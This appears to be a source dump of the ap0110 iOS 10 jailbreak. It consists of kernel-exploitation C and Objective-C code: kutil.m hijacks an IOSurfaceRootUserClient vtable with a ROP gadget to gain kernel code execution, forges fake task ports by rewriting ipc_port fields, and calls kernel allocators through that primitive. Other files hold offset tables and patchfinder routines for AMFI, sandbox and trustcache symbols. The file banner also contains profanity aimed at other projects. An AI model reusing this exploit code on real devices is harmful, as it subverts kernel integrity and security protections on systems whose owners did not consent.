uint64_t what); 44 | 45 | #define wk32(where, what) kwrite_uint32(where, what) 46 | #define wk64(where, what) kwrite_uint64(where, what) 47 | #if __arm64__ 48 | #define wkptr(where, what) wk64(where, what) 49 | #else 50 | #define wkptr(where, what) wk32(where, what) 51 | #endif 52 | 53 | void kfree(mach_vm_address_t address, vm_size_t size); 54 | kptr_t kalloc(vm_size_t size); 55 | 56 | kptr_t kmem_alloc(uint64_t size); 57 | bool kmem_free(mach_vm_address_t kaddr, vm_size_t size); 58 | 59 | uintptr_t find_port(mach_port_name_t port, kptr_t task_self); 60 | 61 | kptr_t make_fake_task(kptr_t vm_map); 62 | bool rkbuffer(kptr_t kaddr, void* buffer, size_t length); 63 | bool wkbuffer(kptr_t kaddr, void* buffer, size_t length); 64 | 65 | kern_return_t mach_vm_remap( 66 | mach_port_name_t target, 67 | mach_vm_address_t *address, 68 | mach_vm_size_t size, 69 | mach_vm_offset_t mask, 70 | int flags, 71 | mach_port_name_t src_task, 72 | mach_vm_address_t src_address, 73 | boolean_t copy, 74 | vm_prot_t *cur_protection, 75 | vm_prot_t *max_protection, 76 | vm_inherit_t inheritance); 77 | 78 | __END_DECLS 79 | 80 | #endif /* kernel_memory_h */ 81 | -------------------------------------------------------------------------------- /Athenus/kutil.h: -------------------------------------------------------------------------------- 1 | // 2 | // kutil.h 3 | // sockH3lix 4 | // 5 | // Created by SXX on 2020/7/25. 6 | // Copyright © 2020 tihmstar. All rights reserved. 7 | // 8 | 9 | #ifndef kexec_h 10 | #define kexec_h 11 | 12 | __BEGIN_DECLS 13 | 14 | #include "sock_port_exploit.h" 15 | 16 | struct port_kernel_context { 17 | uint32_t io_bits; 18 | uint32_t io_references; 19 | uint32_t ip_srights; 20 | uint32_t is_table_bits; 21 | uintptr_t ip_receiver; 22 | uintptr_t ip_kobject; 23 | //kport_t port; 24 | }; 25 | 26 | kptr_t proc_struct_addr(void); 27 | kptr_t get_address_of_port(kptr_t proc, mach_port_t port); 28 | kptr_t make_fake_task(kptr_t vm_map); 29 | void free_fake_task(kptr_t fake_task); 30 | bool make_port_fake_task_port(mach_port_t port, kptr_t task_kaddr, struct port_kernel_context *save); 31 | void restore_port(mach_port_t port, struct port_kernel_context *save); 32 | 33 | bool init_kexec(void); 34 | void term_kexec(void); 35 | kptr_t kexec(kptr_t ptr, kptr_t x0, kptr_t x1, kptr_t x2, kptr_t x3, kptr_t x4, kptr_t x5, kptr_t x6); 36 | 37 | kptr_t proc_struct_addr(void); 38 | kptr_t get_address_of_port(kptr_t proc, mach_port_t port); 39 | 40 | 41 | __END_DECLS 42 | 43 | #endif /* kexec_h */ 44 | -------------------------------------------------------------------------------- /Athenus/kutil.m: -------------------------------------------------------------------------------- 1 | // 2 | // kutil.m 3 | // sockH3lix 4 | // 5 | // Created by SXX on 2020/7/25. 6 | // Copyright © 2020 tihmstar. All rights reserved. 7 | // 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include "common.h" 15 | #include "offsets.h" 16 | #import 17 | #include "kutil.h" 18 | #include "jailbreak.h" 19 | #include "kernel_memory.h" 20 | #include "sock_port_exploit.h" 21 | #include 22 | 23 | // Only support arm64 devices, not arm64e devices. 24 | 25 | static mach_port_t prepare_user_client() { 26 | kern_return_t err; 27 | mach_port_t user_client; 28 | io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOSurfaceRoot")); 29 | 30 | if (service == 0) { 31 | LOG("unable to find service"); 32 | exit(EXIT_FAILURE); 33 | } 34 | 35 | err = IOServiceOpen(service, mach_task_self(), 0, &user_client); 36 | if (err != KERN_SUCCESS) { 37 | LOG("unable to get user client connection"); 38 | exit(EXIT_FAILURE); 39 | } 40 | 41 | return user_client; 42 | } 43 | 44 | static mach_port_t user_client; 45 | static kptr_t IOSurfaceRootUserClient_port; 46 | static kptr_t IOSurfaceRootUserClient_addr; 47 | static kptr_t fake_vtable; 48 | static kptr_t fake_client; 49 | static const int fake_kalloc_size = 0x1000; 50 | 51 | static pthread_mutex_t kexec_lock; 52 | 53 | bool init_kexec() { 54 | puts("kexec: preparing user client"); 55 | user_client = prepare_user_client(); 56 | if (!MACH_PORT_VALID(user_client)) { 57 | return false; 58 | } 59 | puts("kexec: getting user client port address"); 60 | IOSurfaceRootUserClient_port = get_address_of_port(proc_struct_addr(), user_client); 61 | if (!KERN_POINTER_VALID(IOSurfaceRootUserClient_port)) { 62 | return false; 63 | } 64 | puts("kexec: getting user client port ptr"); 65 | IOSurfaceRootUserClient_addr = kread_uintptr(IOSurfaceRootUserClient_port + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); 66 | if (!KERN_POINTER_VALID(IOSurfaceRootUserClient_addr)) { 67 | return false; 68 | } 69 | puts("kexec: getting vtab ptr"); 70 | kptr_t IOSurfaceRootUserClient_vtab = kread_uintptr(IOSurfaceRootUserClient_addr); 71 | if (!KERN_POINTER_VALID(IOSurfaceRootUserClient_vtab)) { 72 | return false; 73 | } 74 | puts("kexec: allocating fake vtable"); 75 | fake_vtable = kmem_alloc(fake_kalloc_size); 76 | if (!KERN_POINTER_VALID(fake_vtable)) { 77 | return false; 78 | } 79 | 80 | size_t buffer_size = fake_kalloc_size; 81 | void *buffer = malloc(fake_kalloc_size); 82 | puts("kexec: copying vtable"); 83 | kread(IOSurfaceRootUserClient_vtab, buffer, buffer_size); 84 | kwrite(fake_vtable, buffer, buffer_size); 85 | puts("kexec: allocating fake client"); 86 | fake_client = kmem_alloc(fake_kalloc_size); 87 | if (!KERN_POINTER_VALID(fake_client)) { 88 | return false; 89 | } 90 | puts("kexec: copying fake client"); 91 | kread(IOSurfaceRootUserClient_addr, buffer, 0x50); 92 | kwrite(fake_client, buffer, 0x50); 93 | puts("kexec: overwriting user client"); 94 | kwrite_uintptr(fake_client, fake_vtable); 95 | kwrite_uintptr(IOSurfaceRootUserClient_port + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT), fake_client); 96 | 97 | // Replace IOUserClient::getExternalTrapForIndex with our ROP gadget (add x0, x0, #0x40; ret;) 98 | puts("kexec: setting ROP"); 99 | #if __arm64__ 100 | kwrite_uint64(fake_vtable + 8 * 0xB7, get_add_x0_x0_0x40_ret()); 101 | #else 102 | kwrite_uint32(fake_vtable + 4 * get_vtab_get_external_trap_for_index(), get_add_x0_x0_0x40_ret() + 1); 103 | #endif 104 | pthread_mutex_init(&kexec_lock, NULL); 105 | free(buffer); 106 | return true; 107 | } 108 | 109 | void term_kexec() { 110 | kwrite_uint64(IOSurfaceRootUserClient_port + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT), IOSurfaceRootUserClient_addr); 111 | kmem_free(fake_vtable, fake_kalloc_size); 112 | kmem_free(fake_client, fake_kalloc_size); 113 | IOServiceClose(user_client); 114 | pthread_mutex_destroy(&kexec_lock); 115 | } 116 | 117 | kptr_t kexec(kptr_t ptr, kptr_t x0, kptr_t x1, kptr_t x2, kptr_t x3, kptr_t x4, kptr_t x5, kptr_t x6) { 118 | kptr_t returnval = 0; 119 | pthread_mutex_lock(&kexec_lock); 120 | const uintptr_t offset = 0x40; 121 | kptr_t off0 = kread_uintptr(fake_client + offset); 122 | kptr_t off1 = kread_uintptr(fake_client + (offset + sizeof(kptr_t))); 123 | #if !__arm64__ 124 | kptr_t off2 = kread_uintptr(fake_client + (offset + 2 * sizeof(kptr_t))); 125 | #endif 126 | kwrite_uintptr(fake_client + offset, x0); 127 | kwrite_uintptr(fake_client + (offset + sizeof(kptr_t)), ptr); 128 | #if !__arm64__ 129 | kwrite_uintptr(fake_client + (offset + 2 * sizeof(kptr_t)), 0); 130 | //printf("kexec "ADDR" "ADDR" "ADDR" "ADDR" "ADDR" "ADDR" "ADDR" "ADDR"\n", ptr, x0, x1, x2, x3, x4, x5, x6); 131 | returnval = IOConnectTrap6(user_client, fake_client + offset, x1, x2, x3, x4, x5, x6); 132 | #else 133 | returnval = IOConnectTrap6(user_client, 0, x1, x2, x3, x4, x5, x6); 134 | #endif 135 | kwrite_uintptr(fake_client + offset, off0); 136 | kwrite_uintptr(fake_client + (offset + sizeof(kptr_t)), off1); 137 | #if !__arm64__ 138 | kwrite_uintptr(fake_client + (offset + 2 * sizeof(kptr_t)), off2); 139 | #endif 140 | pthread_mutex_unlock(&kexec_lock); 141 | return returnval; 142 | } 143 | 144 | #define SafeFreeNULL(X) free(X) 145 | #define _assert(X) if (!(X)) {printf("assert failed\n");;goto out;} 146 | #if __arm64__ 147 | static kptr_t 148 | zm_fix_addr(kptr_t addr) { 149 | typedef struct { 150 | uintptr_t prev; 151 | uintptr_t next; 152 | uintptr_t start; 153 | uintptr_t end; 154 | } kmap_hdr_t; 155 | kptr_t zm_fixed_addr = 0; 156 | kmap_hdr_t *zm_hdr = NULL; 157 | kptr_t const symbol = get_zone_map_ref();//getoffset(zone_map_ref); 158 | _assert(KERN_POINTER_VALID(symbol)); 159 | zm_hdr = malloc(sizeof(kmap_hdr_t)); 160 | _assert(zm_hdr != NULL); 161 | kptr_t const zone_map = kread_uintptr(symbol); 162 | _assert(KERN_POINTER_VALID(zone_map)); 163 | _assert(rkbuffer(zone_map + 0x10, zm_hdr, sizeof(kmap_hdr_t))); 164 | _assert(zm_hdr->end - zm_hdr->start <= 0x100000000); 165 | kptr_t const zm_tmp = (zm_hdr->start & 0xffffffff00000000) | ((addr) & 0xffffffff); 166 | zm_fixed_addr = zm_tmp < zm_hdr->start ? zm_tmp + 0x100000000 : zm_tmp; 167 | out:; 168 | SafeFreeNULL(zm_hdr); 169 | return zm_fixed_addr; 170 | } 171 | 172 | kptr_t IOMalloc(vm_size_t size) { 173 | kptr_t ret = 0; 174 | kptr_t const function = get_IOMalloc();//getoffset(IOMalloc); 175 | _assert(KERN_POINTER_VALID(function)); 176 | ret = kexec(function, (kptr_t)size, 0, 0, 0, 0, 0, 0); 177 | if (ret != 0) ret = zm_fix_addr(ret); 178 | out:; 179 | return ret; 180 | } 181 | #endif 182 | 183 | void IOFree(kptr_t address, vm_size_t size) { 184 | _assert(KERN_POINTER_VALID(address)); 185 | _assert(size > 0); 186 | kptr_t const function = get_IOFree();//getoffset(IOFree); 187 | _assert(KERN_POINTER_VALID(function)); 188 | kexec(function, address, (kptr_t)size, 0, 0, 0, 0, 0); 189 | out:; 190 | } 191 | 192 | kptr_t make_fake_task(kptr_t vm_map) { 193 | kptr_t ret = 0; 194 | kptr_t fake_task_kaddr = 0; 195 | void *fake_task = NULL; 196 | if (!KERN_POINTER_VALID(vm_map)) { 197 | goto out; 198 | } 199 | fake_task_kaddr = kmem_alloc(fake_task_size); 200 | if (!KERN_POINTER_VALID(fake_task_kaddr)) { 201 | goto out; 202 | } 203 | fake_task = malloc(fake_task_size); 204 | if (fake_task == NULL) { 205 | goto out; 206 | } 207 | memset(fake_task, 0, fake_task_size); 208 | *(uint32_t*)(fake_task + koffset(KSTRUCT_OFFSET_TASK_REF_COUNT)) = 0xd00d; 209 | *(uint32_t*)(fake_task + koffset(KSTRUCT_OFFSET_TASK_ACTIVE)) = 1; 210 | *(uint64_t*)(fake_task + koffset(KSTRUCT_OFFSET_TASK_VM_MAP)) = vm_map; 211 | *(uint8_t*)(fake_task + koffset(KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE)) = 0x22; 212 | _assert(wkbuffer(fake_task_kaddr, fake_task, fake_task_size)); 213 | ret = fake_task_kaddr; 214 | out:; 215 | if (!KERN_POINTER_VALID(ret) && KERN_POINTER_VALID(fake_task_kaddr)) { 216 | kmem_free(fake_task_kaddr, fake_task_size); 217 | } 218 | free(fake_task); 219 | return ret; 220 | } 221 | 222 | void 223 | free_fake_task(kptr_t fake_task) { 224 | kmem_free(fake_task, fake_task_size); 225 | } 226 | 227 | #define find_port(port, disposition) ( get_address_of_port(proc_struct_addr(), port)) 228 | 229 | kptr_t ipc_space_kernel() { 230 | kptr_t ret = 0; 231 | kptr_t const task_self = task_self_addr(); 232 | _assert(KERN_POINTER_VALID(task_self)); 233 | kptr_t const ipc_space = kread_uintptr(task_self + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER)); 234 | _assert(KERN_POINTER_VALID(ipc_space)); 235 | ret = ipc_space; 236 | out:; 237 | return ret; 238 | } 239 | 240 | #define IE_BITS_SEND (1<<16) 241 | #define IE_BITS_RECEIVE (1<<17) 242 | #define IO_BITS_ACTIVE 0x80000000 243 | 244 | #define IKOT_TASK 2 245 | 246 | static bool 247 | convert_port_to_task_port(mach_port_t port, kptr_t space, kptr_t task_kaddr, struct port_kernel_context *save) { 248 | bool ret = false; 249 | _assert(MACH_PORT_VALID(port)); 250 | _assert(KERN_POINTER_VALID(space)); 251 | _assert(KERN_POINTER_VALID(task_kaddr)); 252 | kptr_t const port_kaddr = get_address_of_port(proc_struct_addr(), port); 253 | if (save != NULL) { 254 | //kread(port_kaddr, (void*)&save->port, sizeof(save->port)); 255 | save->io_bits = kread_uint32(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IO_BITS)); 256 | save->io_references = kread_uint32(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES)); 257 | save->ip_srights = kread_uint32(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS)); 258 | save->ip_receiver = kread_uintptr(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER)); 259 | save->ip_kobject = kread_uintptr(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); 260 | } 261 | _assert(KERN_POINTER_VALID(port_kaddr)); 262 | _assert(kwrite_uint32(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IO_BITS), IO_BITS_ACTIVE | IKOT_TASK)); 263 | _assert(kwrite_uint32(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES), 0xf00d)); 264 | _assert(kwrite_uint32(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS), 0xf00d)); 265 | _assert(kwrite_uintptr(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER), space)); 266 | _assert(kwrite_uintptr(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT), task_kaddr)); 267 | kptr_t const task_port_addr = task_self_addr(); 268 | _assert(KERN_POINTER_VALID(task_port_addr)); 269 | kptr_t const task_addr = kread_uintptr(task_port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); 270 | _assert(KERN_POINTER_VALID(task_addr)); 271 | kptr_t const itk_space = kread_uintptr(task_addr + koffset(KSTRUCT_OFFSET_TASK_ITK_SPACE)); 272 | _assert(KERN_POINTER_VALID(itk_space)); 273 | kptr_t const is_table = kread_uintptr(itk_space + koffset(KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE)); 274 | _assert(KERN_POINTER_VALID(is_table)); 275 | uint32_t bits = kread_uint32(is_table + (MACH_PORT_INDEX(port) * koffset(KSTRUCT_SIZE_IPC_ENTRY)) + koffset(KSTRUCT_OFFSET_IPC_ENTRY_IE_BITS)); 276 | bits &= (~IE_BITS_RECEIVE); 277 | bits |= IE_BITS_SEND; 278 | _assert(kwrite_uint32(is_table + (MACH_PORT_INDEX(port) * koffset(KSTRUCT_SIZE_IPC_ENTRY)) + koffset(KSTRUCT_OFFSET_IPC_ENTRY_IE_BITS), bits)); 279 | ret = true; 280 | out:; 281 | return ret; 282 | } 283 | 284 | void 285 | restore_port(mach_port_t port, struct port_kernel_context *save) { 286 | kptr_t const port_kaddr = get_address_of_port(proc_struct_addr(), port); 287 | 288 | _assert(kwrite_uint32(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IO_BITS), save->io_bits)); 289 | _assert(kwrite_uint32(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES), save->io_references)); 290 | _assert(kwrite_uint32(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS), save->ip_srights)); 291 | _assert(kwrite_uintptr(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER), save->ip_receiver)); 292 | _assert(kwrite_uintptr(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT), save->ip_kobject)); 293 | 294 | out:; 295 | } 296 | 297 | bool 298 | make_port_fake_task_port(mach_port_t port, kptr_t task_kaddr, struct port_kernel_context *save) { 299 | bool ret = false; 300 | _assert(MACH_PORT_VALID(port)); 301 | _assert(KERN_POINTER_VALID(task_kaddr)); 302 | kptr_t const space = ipc_space_kernel(); 303 | _assert(KERN_POINTER_VALID(space)); 304 | _assert(convert_port_to_task_port(port, space, task_kaddr, save)); 305 | ret = true; 306 | out:; 307 | return ret; 308 | } 309 | 310 | extern kptr_t self_proc_addr; 311 | 312 | kptr_t proc_struct_addr() { 313 | return self_proc_addr; 314 | } 315 | 316 | kptr_t get_address_of_port(kptr_t proc, mach_port_t port) { 317 | kptr_t task_addr = 0; 318 | kread(proc + koffset(KSTRUCT_OFFSET_PROC_TASK), &task_addr, sizeof(task_addr)); 319 | if (!KERN_POINTER_VALID(task_addr)) { 320 | return 0; 321 | } 322 | kptr_t itk_space = 0; 323 | kread(task_addr + koffset(KSTRUCT_OFFSET_TASK_ITK_SPACE), &itk_space, sizeof(task_addr)); 324 | if (!KERN_POINTER_VALID(itk_space)) { 325 | return 0; 326 | } 327 | kptr_t is_table = 0; 328 | kread(itk_space + koffset(KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE), &is_table, sizeof(is_table)); 329 | if (!KERN_POINTER_VALID(is_table)) { 330 | return 0; 331 | } 332 | uint32_t port_index = port >> 8; 333 | const int sizeof_ipc_entry_t = koffset(KSTRUCT_SIZE_IPC_ENTRY); 334 | 335 | kptr_t port_addr = 0; 336 | kread(is_table + (port_index * sizeof_ipc_entry_t), &port_addr, sizeof(port_addr)); 337 | if (!KERN_POINTER_VALID(port_addr)) { 338 | return 0; 339 | } 340 | return port_addr; 341 | } 342 | -------------------------------------------------------------------------------- /Athenus/libs/libimg4tool.a: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/athenusdev/ap0110/2b2f4a21993f696df7c820708365001dcc38a3b4/Athenus/libs/libimg4tool.a -------------------------------------------------------------------------------- /Athenus/libs/libplist++.a: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/athenusdev/ap0110/2b2f4a21993f696df7c820708365001dcc38a3b4/Athenus/libs/libplist++.a -------------------------------------------------------------------------------- /Athenus/libs/libplist.a: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/athenusdev/ap0110/2b2f4a21993f696df7c820708365001dcc38a3b4/Athenus/libs/libplist.a -------------------------------------------------------------------------------- /Athenus/main.m: -------------------------------------------------------------------------------- 1 | /* 2 | * ___ _ _ ___ 3 | * __ _ _ __ / _ \/ / |/ _ \ 4 | * / _` | '_ \| | | | | | | | | 5 | * | (_| | |_) | |_| | | | |_| | 6 | * \__,_| .__/ \___/|_|_|\___/ 7 | * |_| 8 | * 9 | * ap0110 is an autoexecuting jailbreak for iOS 10.x, on 64 and 32 bit. 10 | * Licensed under GPLv2, fuck v3. 11 | * Fuck manticore and iMuseum 12 | * 13 | * - with love from the Athenus Dev Team and w212. 14 | */ 15 | 16 | #import 17 | #import "AppDelegate.h" 18 | #include 19 | 20 | int main(int argc, char * argv[]) { 21 | // dsystem = dlsym(RTLD_DEFAULT,"system"); 22 | @autoreleasepool { 23 | return UIApplicationMain(argc, argv, nil, NSStringFromClass([AppDelegate class])); // important!!! 24 | } 25 | } 26 | -------------------------------------------------------------------------------- /Athenus/offsets.h: -------------------------------------------------------------------------------- 1 | #ifndef OFFSETS_H 2 | #define OFFSETS_H 3 | 4 | #include "common.h" // kptr_t 5 | 6 | __BEGIN_DECLS 7 | 8 | typedef struct { 9 | kptr_t base; 10 | // Structure offsets 11 | kptr_t sizeof_task; 12 | //kptr_t task_itk_self; 13 | //kptr_t task_itk_registered; 14 | kptr_t task_bsd_info; 15 | kptr_t proc_ucred; 16 | #ifdef __LP64__ 17 | //kptr_t vm_map_hdr; 18 | #endif 19 | //kptr_t ipc_space_is_task; 20 | //kptr_t realhost_special; 21 | //kptr_t iouserclient_ipc; 22 | //kptr_t vtab_get_retain_count; 23 | //kptr_t vtab_get_external_trap_for_index; 24 | // Data 25 | kptr_t zone_map; 26 | kptr_t kernel_map; 27 | kptr_t kernel_task; 28 | kptr_t realhost; 29 | // Code 30 | //kptr_t copyin; 31 | //kptr_t copyout; 32 | //kptr_t chgproccnt; 33 | //kptr_t kauth_cred_ref; 34 | //kptr_t ipc_port_alloc_special; 35 | //kptr_t ipc_kobject_set; 36 | //kptr_t ipc_port_make_send; 37 | //kptr_t osserializer_serialize; 38 | #ifdef __LP64__ 39 | //kptr_t rop_ldr_x0_x0_0x10; 40 | #else 41 | //kptr_t rop_ldr_r0_r0_0xc; 42 | #endif 43 | } offsets_t; 44 | 45 | offsets_t* get_offsets(void*); 46 | 47 | enum kstruct_offset { 48 | /* struct task */ 49 | KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE, 50 | KSTRUCT_OFFSET_TASK_REF_COUNT, 51 | KSTRUCT_OFFSET_TASK_ACTIVE, 52 | KSTRUCT_OFFSET_TASK_VM_MAP, 53 | KSTRUCT_OFFSET_TASK_NEXT, 54 | KSTRUCT_OFFSET_TASK_PREV, 55 | KSTRUCT_OFFSET_TASK_ITK_SELF, 56 | KSTRUCT_OFFSET_TASK_ITK_SPACE, 57 | KSTRUCT_OFFSET_TASK_BSD_INFO, 58 | 59 | /* struct ipc_port */ 60 | KSTRUCT_OFFSET_IPC_PORT_IO_BITS, 61 | KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES, 62 | KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE, 63 | KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT, 64 | KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER, 65 | KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT, 66 | KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG, 67 | KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT, 68 | KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS, 69 | 70 | /* struct proc */ 71 | KSTRUCT_OFFSET_PROC_PID, 72 | KSTRUCT_OFFSET_PROC_P_FD, 73 | KSTRUCT_OFFSET_PROC_TASK, 74 | 75 | /* struct filedesc */ 76 | KSTRUCT_OFFSET_FILEDESC_FD_OFILES, 77 | 78 | /* struct fileproc */ 79 | KSTRUCT_OFFSET_FILEPROC_F_FGLOB, 80 | 81 | /* struct fileglob */ 82 | KSTRUCT_OFFSET_FILEGLOB_FG_DATA, 83 | 84 | /* struct socket */ 85 | KSTRUCT_OFFSET_SOCKET_SO_PCB, 86 | 87 | /* struct pipe */ 88 | KSTRUCT_OFFSET_PIPE_BUFFER, 89 | 90 | /* struct ipc_space */ 91 | KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE, 92 | KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE, 93 | 94 | /* struct host */ 95 | KSTRUCT_OFFSET_HOST_SPECIAL, 96 | 97 | KFREE_ADDR_OFFSET, 98 | KSTRUCT_SIZE_IPC_ENTRY, 99 | KSTRUCT_OFFSET_IPC_ENTRY_IE_BITS, 100 | }; 101 | 102 | struct cpu_cache_data { 103 | uint32_t mmu_i_cline; 104 | uint32_t mmu_csize; 105 | uint32_t mmu_cline; 106 | uint32_t mmu_nway; 107 | uint32_t mmu_i7set; 108 | uint32_t mmu_i7way; 109 | uint32_t mmu_i9way; 110 | uint32_t mmu_sway; 111 | uint32_t mmu_nset; 112 | uint32_t l2_csize; 113 | uint32_t l2_cline; 114 | uint32_t l2_nway; 115 | uint32_t l2_i7set; 116 | uint32_t l2_i7way; 117 | uint32_t l2_i9way; 118 | uint32_t l2_sway; 119 | uint32_t l2_nset; 120 | }; 121 | 122 | int koffset(enum kstruct_offset offset); 123 | void offsets_init(void); 124 | 125 | extern uint32_t create_outsize; 126 | extern size_t fake_task_size; 127 | 128 | extern size_t get_add_x0_x0_0x40_ret(void); 129 | extern size_t get_IOMalloc(void); 130 | extern size_t get_zone_map_ref(void); 131 | extern size_t get_IOFree(void); 132 | extern size_t get_vtab_get_external_trap_for_index(void); 133 | extern struct cpu_cache_data get_cache_data(void); 134 | 135 | __END_DECLS 136 | 137 | #endif 138 | -------------------------------------------------------------------------------- /Athenus/offsets.mm: -------------------------------------------------------------------------------- 1 | #include 2 | #include // strcmp, strerror 3 | #include // uname 4 | 5 | #include "common.h" // LOG, kptr_t 6 | #include "offsets.h" 7 | #include 8 | 9 | static offsets_t offs; 10 | static bool didInit = false; 11 | size_t fake_task_size = 0; 12 | 13 | extern "C" offsets_t* get_offsets(void *fi_) { 14 | offsetfinder *fi = static_cast(fi_); 15 | if (!didInit){ 16 | offs.base = (kptr_t)fi->linker_base(); 17 | 18 | offs.sizeof_task = (kptr_t)fi->find_sizeof_task(); 19 | //offs.task_itk_self = (kptr_t)fi->find_task_itk_self(); 20 | //offs.task_itk_registered = (kptr_t)fi->find_task_itk_registered(); 21 | offs.task_bsd_info = koffset(KSTRUCT_OFFSET_TASK_BSD_INFO); 22 | //(kptr_t)fi->find_task_bsd_info(); 23 | offs.proc_ucred = (kptr_t)fi->find_proc_ucred(); 24 | //offs.vm_map_hdr = (kptr_t)fi->find_vm_map_hdr(); 25 | //offs.ipc_space_is_task = (kptr_t)fi->find_ipc_space_is_task(); 26 | //offs.realhost_special = koffset(KSTRUCT_OFFSET_HOST_SPECIAL);//0x10; 27 | //offs.iouserclient_ipc = (kptr_t)fi->find_iouserclient_ipc(); 28 | //offs.vtab_get_retain_count = (kptr_t)fi->find_vtab_get_retain_count(); 29 | //offs.vtab_get_external_trap_for_index = (kptr_t)fi->find_vtab_get_external_trap_for_index(); 30 | 31 | offs.zone_map = (kptr_t)fi->find_zone_map(); 32 | offs.kernel_map = (kptr_t)fi->find_kernel_map(); 33 | offs.kernel_task = (kptr_t)fi->find_kernel_task(); 34 | offs.realhost = (kptr_t)fi->find_realhost(); 35 | fake_task_size = round_page_kernel(offs.sizeof_task); 36 | printf("Task size: %zu, fake task size: %zd\n", (size_t)offs.sizeof_task, fake_task_size); 37 | 38 | //offs.copyin = (kptr_t)fi->find_copyin(); 39 | //offs.copyout = (kptr_t)fi->find_copyout(); 40 | //offs.chgproccnt = (kptr_t)fi->find_chgproccnt(); 41 | //offs.kauth_cred_ref = (kptr_t)fi->find_kauth_cred_ref(); 42 | //offs.ipc_port_alloc_special = (kptr_t)fi->find_ipc_port_alloc_special(); 43 | //offs.ipc_kobject_set = (kptr_t)fi->find_ipc_kobject_set(); 44 | //offs.ipc_port_make_send = (kptr_t)fi->find_ipc_port_make_send(); 45 | //offs.osserializer_serialize = (kptr_t)fi->find_osserializer_serialize(); 46 | //offs.rop_ldr_x0_x0_0x10 = (kptr_t)fi->find_rop_ldr_x0_x0_0x10(); 47 | didInit = true; 48 | } 49 | return &offs; 50 | } 51 | -------------------------------------------------------------------------------- /Athenus/patchfinder64.h: -------------------------------------------------------------------------------- 1 | #ifndef PATCHFINDER64_H_ 2 | #define PATCHFINDER64_H_ 3 | 4 | #include 5 | #include 6 | #include 7 | 8 | #if __arm64__ 9 | 10 | extern bool auth_ptrs; 11 | extern bool monolithic_kernel; 12 | 13 | int init_kernel(size_t (*kread)(uint64_t, void *, size_t), uint64_t kernel_base, const char *filename); 14 | void term_kernel(void); 15 | 16 | enum text_bases { 17 | text_xnucore_base = 0, 18 | text_prelink_base, 19 | text_ppl_base 20 | }; 21 | 22 | enum string_bases { 23 | string_base_cstring = 0, 24 | string_base_pstring, 25 | string_base_oslstring, 26 | string_base_data, 27 | string_base_const 28 | }; 29 | 30 | uint64_t find_register_value(uint64_t where, int reg); 31 | uint64_t find_reference(uint64_t to, int n, enum text_bases base); 32 | uint64_t find_strref(const char *string, int n, enum string_bases string_base, bool full_match, bool ppl_base); 33 | uint64_t find_gPhysBase(void); 34 | uint64_t find_kernel_pmap(void); 35 | uint64_t find_amfiret(void); 36 | uint64_t find_ret_0(void); 37 | uint64_t find_amfi_memcmpstub(void); 38 | uint64_t find_sbops(void); 39 | uint64_t find_lwvm_mapio_patch(void); 40 | uint64_t find_lwvm_mapio_newj(void); 41 | 42 | uint64_t find_entry(void); 43 | const unsigned char *find_mh(void); 44 | 45 | uint64_t find_cpacr_write(void); 46 | uint64_t find_str(const char *string); 47 | uint64_t find_amfiops(void); 48 | uint64_t find_sysbootnonce(void); 49 | uint64_t find_trustcache(void); 50 | uint64_t find_amficache(void); 51 | uint64_t find_allproc(void); 52 | uint64_t find_vfs_context_current(void); 53 | uint64_t find_vnode_lookup(void); 54 | uint64_t find_vnode_put(void); 55 | uint64_t find_vnode_getfromfd(void); 56 | uint64_t find_vnode_getattr(void); 57 | uint64_t find_SHA1Init(void); 58 | uint64_t find_SHA1Update(void); 59 | uint64_t find_SHA1Final(void); 60 | uint64_t find_csblob_entitlements_dictionary_set(void); 61 | uint64_t find_kernel_task(void); 62 | uint64_t find_kernproc(void); 63 | uint64_t find_vnode_recycle(void); 64 | uint64_t find_lck_mtx_lock(void); 65 | uint64_t find_lck_mtx_unlock(void); 66 | uint64_t find_strlen(void); 67 | uint64_t find_add_x0_x0_0x40_ret(void); 68 | uint64_t find_boottime(void); 69 | uint64_t find_zone_map_ref(void); 70 | uint64_t find_OSBoolean_True(void); 71 | uint64_t find_osunserializexml(void); 72 | uint64_t find_smalloc(void); 73 | uint64_t find_shenanigans(void); 74 